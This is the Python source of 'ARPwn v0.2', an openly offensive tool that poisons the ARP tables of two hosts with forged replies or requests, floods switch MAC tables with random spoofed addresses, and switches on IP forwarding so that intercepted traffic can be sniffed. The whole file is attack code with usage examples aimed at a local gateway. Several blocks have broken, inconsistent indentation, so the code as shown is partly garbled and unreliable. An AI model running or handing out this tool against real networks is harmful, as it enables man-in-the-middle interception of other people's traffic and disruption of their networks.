ARPwn v0.2 by Muffins

#!/usr/bin/python
#
#        ARPwn v0.2 (2013)
#   Muffin's ARP Poisoning Tool
#
# This tool can poison the ARP tables of two targets with
# either ARP replies OR ARP requests.  It can also flood the ARP
# table of a single machine or a whole subnet( $10,000 switch = $10 hub )
#
#Usage:
#
#  Enable ip forwarding with "./arpwn -f 1", where 1 is ON and 0 is OFF
#
#Two way ARP poisoning:
#
#  "./arpwn -flag delay target_ip1 target_ip2", where -flag = -r or -q
#
#  -r is for ARP replies and -q is for ARP requests
#
#   delay is an integer
#
#   Now you can open your sniffing software and capture.
#
#MAC Flooding:
#
#  "./arpwn -m Target_MAC SRC_IP
#
#  IMPORTANT: SRC_IP is a spoofed source ip of the form W X Y Z
#  where W X Y Z are integers 0-255 or rand
#
#  Example: "./arpwn -m ff:ff:ff:ff:ff:ff 10 rand 0 rand
#
#  Here rand will cause the program to generate a random integer
#  0-255.  So this example might generate the first ip as
#
#  10.32.0.125, or 10.15.0.12, or any other ip of that form.
#
#  NOTE: If using rand, each new ARP packet will mostly
#  have a different ip, of course there will be repeats at some point.
#
#  Questions?  Email me at gotnerdy@gmail.com


from scapy.all import *
import sys
import time
import os

try:
    if sys.argv[1] == "-r" :

        delay = int(sys.argv[2])
        victim1 = sys.argv[3]
        victim2 = sys.argv[4]
        #mac = sys.argv[3]

        a = ARP()
        a.op = 2
        #a.hwdst = mac

        print ""
        print "ARPwn v0.2 (2013)"
        print "Muffins' ARP Poisoning Tool"
        print ""
        print "ARP Reply Mode"
        print "Victim 1: "+victim1
        print "Victim 2: "+victim2
        print "Continuous Delay: "+str(delay)+" second(s)"
        print ""
        print "Ctrl-C to quit"
        try:
            while 1:
                a.psrc = sys.argv[3]
                a.pdst = sys.argv[4]
                send(a,verbose = 0)

                a.psrc = sys.argv[4]
                a.pdst = sys.argv[3]
                send(a,verbose = 0)

                time.sleep(delay)
        except:
            sys.exit(0)

    elif sys.argv[1] == "-q":

        delay = int(sys.argv[2])
        victim1 = sys.argv[3]
            victim2 = sys.argv[4]

        a = ARP()
            a.op = 1

        print ""
            print "ARPwn v0.2 (2013)"
            print "Muffins' ARP Poisoning Tool"
            print ""
        print "ARP Request Mode"
            print "Victim 1: "+victim1
            print "Victim 2: "+victim2
            print "Continuous Delay: "+str(delay)+" second(s)"
            print ""
            print "Ctrl-C to quit"
            try:
                    while 1:
                            a.psrc = sys.argv[3]
                            a.pdst = sys.argv[4]
                            send(a,verbose = 0)

                            a.psrc = sys.argv[4]
                            a.pdst = sys.argv[3]
                            send(a,verbose = 0)

                            time.sleep(delay)
            except:
                    sys.exit(0)

    elif sys.argv[1] == "-m":
        try:
            e = Ether()
            a = ARP()
            a.op = 2
            e.dst = sys.argv[2]
            e.hwdst = sys.argv[2]

            print ""
            print "ARPwn v0.2 (2013)"
            print "Muffins' ARP Poisoning Tool"
            print ""
            print "MAC Flooding "+str(sys.argv[2])
            print ""
            print "Ctrl-C to quit"
            while 1:
                        src_mac = RandMAC()
                                e.src = src_mac
                                a.hwsrc = src_mac

                if sys.argv[3] == "rand":
                    result = str(random.randint(0,255))
                else:
                    result = str(sys.argv[3])
                for t in range(4,7):
                    if sys.argv[t] == "rand":
                        result = result+"."+str(random.randint(0,255))
                    else:
                        result = result+"."+sys.argv[t]

                a.psrc = result
                sendp(e/a,verbose = 0)
        except:
            sys.exit(0)
    elif sys.argv[1] == "-f":
        try:
            if int(sys.argv[2]) == 0:
                os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
                print "IP Forwarding is now OFF"
            elif int(sys.argv[2]) == 1:
                os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
                print "IP Forwarding is now ON"

        except:
            sys.exit(0)
    else:
        pass


except:
        print ""
    print "You have done something wrong."
    print ""
    print "Usage:"
    print " For two-way arp poisoning"
    print " ./arpwn -type delay target_ip1 target_ip2"
    print "     where -type is r for ARP replay"
    print "     where -type is q for ARP request"
    print ""
    print " ex: ./arpwn -r 10 192.168.1.23 192.168.1.1"
    print ""
    print " For mac flood"
    print "  ./arpwn -m DST_MAC SPOOF_IP"
    print "     where DST is the destination mac"
    print "     where SPOOF_IP is 0-225 or rand "
    print ""
    print "     ex: ./arpwn -m ff:ff:ff:ff:ff:ff 192 168 1 rand"
    print ""

else:
    pass